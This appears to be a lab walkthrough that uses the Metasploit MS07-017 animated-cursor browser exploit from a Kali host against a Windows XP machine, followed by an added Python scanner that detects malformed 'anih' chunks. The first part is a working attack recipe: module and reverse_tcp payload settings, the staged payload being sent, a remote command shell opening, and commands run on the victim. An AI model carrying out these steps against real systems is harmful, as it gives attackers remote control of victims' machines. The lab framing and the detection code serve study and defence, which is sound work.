1. Passive exploit (browser-access attack)
Environment:
Kali: 10.0.0.132
Windows XP: 10.0.0.106
Step 1: Create the payload
msf > use exploit/windows/browser/ms07_017_ani_loadimage_chunksize
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > set SRVHOST 10.0.0.132
SRVHOST => 10.0.0.132
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > set lhost 10.0.0.132
lhost => 10.0.0.132
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > show options

Module options (exploit/windows/browser/ms07_017_ani_loadimage_chunksize):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  10.0.0.132       yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  80               yes       The daemon port to listen on
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH  /                yes       The URI to use.

Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.0.0.132       yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   (Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vista

msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > exploit
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 10.0.0.132:4444
[*] Using URL: http://10.0.0.132:80/
[*] Server started.
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) >
Step 2: Open the URL in the browser on the Windows XP machine
Step 3: Check the Kali side
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > [*] 10.0.0.106       ms07_017_ani_loadimage_chunksize - Attempting to exploit ani_loadimage_chunksize
[*] 10.0.0.106       ms07_017_ani_loadimage_chunksize - Sending HTML page
[*] 10.0.0.106       ms07_017_ani_loadimage_chunksize - Attempting to exploit ani_loadimage_chunksize
[*] 10.0.0.106       ms07_017_ani_loadimage_chunksize - Sending Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.0.0.106
[*] Command shell session 1 opened (10.0.0.132:4444 -> 10.0.0.106:1069) at 2019-05-07 10:00:18 +0800

msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > sessions

Active sessions
===============

  Id  Name  Type               Information  Connection
  --  ----  ----               -----------  ----------
  1         shell x86/windows               10.0.0.132:4444 -> 10.0.0.106:1069 (10.0.0.106)

msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

C:\Documents and Settings\admin\??>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter 本地连接:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 10.0.0.106
        Subnet Mask . . . . . . . . . . . : 255.0.0.0
        Default Gateway . . . . . . . . . : 10.0.0.254

Ethernet adapter Bluetooth 网络连接:

        Media State . . . . . . . . . . . : Media disconnected
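The module log above names the bug being triggered: the MS07-017 LoadAniIcon() chunk-size overflow, where an animated-cursor (.ani) file carries an "anih" chunk whose declared size is not the 36-byte ANIHEADER. On the defensive side, a proxy or gateway scanner can flag that pattern before the file reaches a browser. The checker below is an added example, not code from the original post or from Metasploit; it walks the RIFF/ACON chunk list and reports any anih chunk with a size field other than 36, plus any second anih chunk, and scans two sample files that are constructed inline.

```python
import struct

ANIH_SIZE = 36  # sizeof(ANIHEADER): the only valid payload size for an "anih" chunk


def scan_ani(data: bytes):
    """Walk the RIFF chunks of an animated-cursor (.ani) file and return a list of
    (offset, chunk_id, declared_size, note) findings. An empty list means nothing
    matched the MS07-017 pattern (an "anih" chunk whose size field is not 36, or a
    second "anih" chunk after the first one)."""
    findings = []
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"ACON":
        return [(0, b"RIFF", 0, "not a RIFF/ACON animated cursor")]
    pos, anih_seen = 12, 0
    while pos + 8 <= len(data):
        cid = data[pos:pos + 4]
        size = struct.unpack_from("<I", data, pos + 4)[0]
        if cid == b"LIST":
            # LIST is a container (e.g. the "fram" list); step into it and keep walking
            pos += 12
            continue
        if cid == b"anih":
            anih_seen += 1
            if size != ANIH_SIZE:
                findings.append((pos, cid, size, "anih size field is not 36"))
            if anih_seen > 1:
                findings.append((pos, cid, size, "second anih chunk"))
        pos += 8 + size + (size & 1)  # RIFF chunks are padded to an even length
    return findings


def _chunk(cid: bytes, payload: bytes) -> bytes:
    return cid + struct.pack("<I", len(payload)) + payload + (b"\0" * (len(payload) & 1))


def build_ani(chunks) -> bytes:
    """Wrap already-encoded chunks in a RIFF/ACON container (constructed test data)."""
    body = b"ACON" + b"".join(chunks)
    return b"RIFF" + struct.pack("<I", len(body)) + body


# Constructed samples: a well-formed header, and one with an oversized second anih chunk
BENIGN = build_ani([_chunk(b"anih", bytes(ANIH_SIZE))])
SUSPECT = build_ani([_chunk(b"anih", bytes(ANIH_SIZE)), _chunk(b"anih", bytes(64))])

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, scan_ani(sample) or "clean")
```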